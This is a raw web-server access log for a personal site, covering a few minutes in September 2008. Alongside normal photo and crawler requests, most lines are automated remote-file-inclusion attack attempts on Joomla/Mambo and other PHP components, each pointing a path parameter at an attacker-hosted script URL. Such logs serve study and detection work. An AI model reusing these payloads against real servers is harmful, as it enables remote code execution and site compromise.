222.231.24.53 - - [20/Sep/2008:10:17:33 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://danieledm.altervista.org/PhP/id_osirys.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:17:36 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:17:36 -0700] "GET /logs/access_080525.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:17:37 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:17:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-161.jpg HTTP/1.1" 200 609582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:17:41 -0700] "GET /logs/access_080522.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:17:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:17:55 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92631 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:18:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_3.jpg HTTP/1.1" 200 407435 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:18:13 -0700] "GET /logs/access_080905.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:18:14 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:18:14 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:18:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-078_0.jpg HTTP/1.1" 200 422961 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:18:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-038_3.jpg HTTP/1.1" 200 446837 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:18:40 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:18:41 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92671 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:18:41 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:18:42 -0700] "GET /logs/access_080807.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:18:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020_3.jpg HTTP/1.1" 200 353689 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:19:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-001.jpg HTTP/1.1" 200 362254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:10 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92671 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:16 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:17 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92656 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:17 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:19:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-197.jpg HTTP/1.1" 200 258138 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:17 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.70.114 - - [20/Sep/2008:10:19:27 -0700] "GET /bikes/occcb/eBayISAPI.dll_files/91ac_1.JPG HTTP/1.1" 200 26294 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:19:27 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:19:28 -0700] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.109.157 - - [20/Sep/2008:10:19:28 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92767 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:19:31 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1008.jpg HTTP/1.1" 200 332259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:19:34 -0700] "GET /logs/access_080112.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:19:34 -0700] "GET /logs/access_080315.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:19:34 -0700] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.54.122 - - [20/Sep/2008:10:19:34 -0700] "GET /logs/access_071213.log/data/inc/lang/en.php?=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:19:34 -0700] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92486 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:19:35 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:19:37 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92671 "-" "libwww-perl/5.79" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:10:19:37 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:19:38 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:19:44 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/91ac_1.jpg HTTP/1.1" 200 26294 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:10:19:45 -0700] "GET /logs/access_071213.log/data/inc/lang/en.php?=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.36.144.8 - - [20/Sep/2008:10:19:46 -0700] "GET /logs/access_080422.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:19:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-143_0.jpg HTTP/1.1" 200 394995 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:20:00 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92640 "-" "libwww-perl/5.810" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:20:06 -0700] "GET /logs/access_080315.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:20:06 -0700] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:20:07 -0700] "GET /logs/access_080112.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:20:08 -0700] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92470 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:20:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-024_4.jpg HTTP/1.1" 200 320464 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:12 -0700] "GET /logs/access_080219.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:12 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:13 -0700] "GET /logs/access_080219.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:14 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:14 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92266 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:14 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92250 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:20:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-087.jpg HTTP/1.1" 200 649120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:27 -0700] "GET /logs/access_080219.log/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:28 -0700] "GET /logs/?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 65877 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [20/Sep/2008:10:20:28 -0700] "GET /?mosConfig_absolute_path=http://chebugis.net/chid.txt??? HTTP/1.1" 200 92266 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:20:29 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92716 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:20:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.alevichat.com/ids.txt?? HTTP/1.1" 200 92255 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:20:37 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:20:38 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92639 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:20:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048.jpg HTTP/1.1" 200 554270 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:20:40 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:20:45 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [20/Sep/2008:10:20:46 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92750 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:20:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-229.jpg HTTP/1.1" 200 518803 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.191.76.130 - - [20/Sep/2008:10:20:53 -0700] "GET /logs/access_080830.log//phplive/setup/header.php?css_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:21:06 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-004_4.jpg HTTP/1.1" 200 282066 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:21:13 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:21:13 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:21:14 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:10:21:14 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.konkurent.ru/poll/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:19 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:21:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-251.jpg HTTP/1.1" 200 304719 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:20 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92656 "-" "libwww-perl/5.810" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:21:20 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:21:21 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92681 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:21:28 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:21:29 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92690 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:21:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-167_1.jpg HTTP/1.1" 200 259505 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:38 -0700] "GET /logs/access_080412.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:39 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92716 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:39 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.1.202 - - [20/Sep/2008:10:21:43 -0700] "GET /logs/access_080515.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:21:45 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:21:46 -0700] "GET /logs/access_080315.log%20/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:21:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-224.jpg HTTP/1.1" 200 482991 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:21:51 -0700] "GET /logs/access_080315.log%20/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [20/Sep/2008:10:22:14 -0700] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:22:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0019.jpg HTTP/1.1" 200 359204 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:22:28 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-255.jpg HTTP/1.1" 200 376933 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.9.247.34 - - [20/Sep/2008:10:22:28 -0700] "GET /logs/access_080625.log//common/db.php?commonpath=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.247.34 - - [20/Sep/2008:10:22:28 -0700] "GET //common/db.php?commonpath=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.247.34 - - [20/Sep/2008:10:22:28 -0700] "GET /logs//common/db.php?commonpath=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:22:34 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:22:36 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 200 92536 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:22:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-160_0.jpg HTTP/1.1" 200 539450 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:22:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_1.jpg HTTP/1.1" 200 310770 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:22:56 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92671 "-" "libwww-perl/5.79" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:22:57 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.129.168 - - [20/Sep/2008:10:22:57 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.lanarkshiremosque.com/id.txt?? HTTP/1.1" 200 92536 "-" "libwww-perl/5.805" "www.dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:23:01 -0700] "GET /logs/access_080803.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:23:08 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002_3.jpg HTTP/1.1" 200 456103 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
203.144.4.70 - - [20/Sep/2008:10:23:08 -0700] "GET /logs/access_080803.log/index.php?url=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:23:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107_0.jpg HTTP/1.1" 200 371028 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
